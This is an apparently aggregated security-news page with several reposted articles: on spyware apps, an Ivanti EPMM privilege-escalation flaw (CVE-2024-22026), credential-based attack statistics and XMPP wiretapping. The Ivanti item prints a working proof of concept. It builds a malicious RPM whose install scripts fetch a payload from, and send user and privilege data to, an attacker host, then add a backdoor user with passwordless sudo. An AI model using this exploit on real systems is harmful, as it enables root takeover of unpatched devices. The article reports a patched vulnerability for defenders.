Three Android apps on Google Play were used by state-sponsored threat actors to collect intelligence from targeted devices, such as location data and contact lists. […] Read More
BleepingComputer
The all in one place for non-profit security aid.
Three Android apps on Google Play were used by state-sponsored threat actors to collect intelligence from targeted devices, such as location data and contact lists. […] Read More
BleepingComputer
PoC Exploit Released for Ivanti EPMM MobileIron Core
A newly disclosed vulnerability, CVE-2024-22026, has been found in Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core.
This vulnerability allows a local attacker to gain root access to affected systems.
The severity of this vulnerability is currently undetermined.
The attack vector for CVE-2024-22026 is local, meaning the attacker must have local access to the system to exploit the vulnerability, as per reports by Github.
Once exploited, the attacker can gain root access, which provides full control over the system and can potentially lead to significant security breaches.
Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers
The device uses the following command as a low-privilege user to get and install RPM packages:
install rpm url <remote url>
This command is a CLI wrapper for the following to occur, which runs as root:
/bin/rpm -Uvh *.rpm
It’s possible to run any RPM package because the RPM command itself doesn’t check signatures or block URLs. An attacker can create a fake RPM package and send it to the device, making it vulnerable.
Exploitation PoCCreating the Malicious RPM
The following command is used to create a malicious RPM package:
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 –description “Ivanti POC” –maintainer “exploit-poc” –before-install preinstall.sh –after-install postinstall.sh -C .
Preinstall Script (preinstall.sh)
#!/bin/sh
curl -O http://<attacker_IP>/poc
exit 0
Postinstall Script (postinstall.sh)
#!/bin/sh
set -e # Enable strict error checking
# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)
curl http://<attacker_IP>/poc?user=$CURRENT_USER
curl http://<attacker_IP>/poc?priv=$PRIV_LEVEL
# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
echo “Failed to add user ‘exploit-poc'” >&2
exit 1
fi
echo “exploit-poc:<redacted_password>” | chpasswd
# Grant root privileges
if ! echo “exploit-poc ALL=(ALL) NOPASSWD: ALL” >> /etc/sudoers; then
echo “Failed to modify sudoers file” >&2
exit 1
fi
exit 0
Running the CLI Command to Fetch the RPM: To take advantage of the flaw, the attacker would use the code below in the CLI to get the malicious RPM and install it:
install rpm url http://<attacker_IP>/ivanti-privesc-13.37-1.i386.rpm
Ivanti has released patches to address this vulnerability in versions 12.1.0.0, 12.0.0.0, and 11.12.0.1.
It is strongly recommended that users update these versions to mitigate the risk associated with CVE-2024-22026.
On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free
The post PoC Exploit Released for Ivanti EPMM MobileIron Core appeared first on Cyber Security News.
Huge Surge In Attacks Exploiting User Credentials To Hack Enterprises
[[{“value”:”
There are currently billions of compromised credentials available on the Dark Web, making it the easiest route for criminals to exploit legitimate accounts.
Info-stealing malware, which is meant to obtain personally identifiable information such as email addresses, passwords for social networking and messaging apps, bank account information, cryptocurrency wallet data, and more, is expected to increase 266% in 2023.
This indicates that attackers were investing greater resources in identity theft.
Major attacks triggered by attackers using legitimate accounts required approximately 200% more sophisticated response procedures from security teams than the average incident, with defenders having to discern between legitimate and malicious user behavior on the network.
This extensive monitoring of users’ online behavior was made clear when the FBI and European law enforcement took down a global criminal forum in April 2023, gathering the login credentials of over 80 million accounts.
Threats based on identity will probably keep increasing as long as adversaries use generative AI to make their attacks more effective.
“In 2023, we observed over 800,000 posts on AI and GPT across Dark Web forums, reaffirming these innovations have caught cybercriminals attention and interest”, the X-Force Threat Intelligence team said.
Document
Analyse Shopisticated Malware with ANY.RUN
Try ANY.RUN Yourself with a 14-day Free Trial
More than 300,000 analysts use ANY.RUN is a malware analysis sandbox worldwide. Join the community to conduct in-depth investigations into the top threats and collect detailed reports on their behavior..
Critical infrastructure firms were the target of roughly 70% of attacks. This is a concerning statistic that shows that cybercriminals are betting on these high-value targets’ requirements for uptime to achieve their goals.
Phishing emails, the use of legitimate accounts, and the exploitation of public-facing applications were the causes of over 85% of the attacks.
With DHS CISA reporting that most successful attacks against government agencies, critical infrastructure companies, and state-level government bodies in 2022 featured the use of legitimate accounts, the latter presents a higher risk to the industry.
The report also mentions that the security industry’s traditional view of “basic security” may not be as feasible, as evidenced by the fact that compromise could have been avoided in approximately 85% of attacks on important sectors through the use of patching, multi-factor authentication, or least-privilege principles.
“Our findings reveal that identity is increasingly being weaponized against enterprises, exploiting valid accounts and compromising credentials.
It also shows us that the biggest security concern for enterprises stems not from novel or cryptic threats, but from well-known and existing ones.” reads the report.
According to the data, a startling 50% of cyberattacks in the UK started by using legitimate accounts as the attack vector, and another 25% of cases included using public-facing applications.
According to IBM, attacks resulting from the use of legitimate accounts increased 66% in Europe between the previous year and 2023, making the region the most targeted globally.
The report highlights that nearly a percent of cyberattacks rely on legitimate accounts to gain initial access, which poses serious obstacles to organizations’ efforts to recover.
Businesses need to take a strategic strategy to counter this danger, incorporating contemporary security practices to reduce risks and fortify their defenses against the always-changing field of cyberattacks.
You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are extremely harmful, can wreak havoc, and damage your network.
Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.
The post Huge Surge In Attacks Exploiting User Credentials To Hack Enterprises appeared first on Cyber Security News.
“}]] Read More
Cyber Security News
Researchers Uncover Wiretapping of XMPP-Based Instant Messaging Service
New findings have shed light on what’s said to be a lawful attempt to covertly intercept traffic originating from jabber[.]ru (aka xmpp[.]ru), an XMPP-based instant messaging service, via servers hosted on Hetzner and Linode (a subsidiary of Akamai) in Germany.
"The attacker has issued several new TLS certificates using Let’s Encrypt service which were used to hijack encrypted STARTTLS Read More
The Hacker News | #1 Trusted Cybersecurity News Site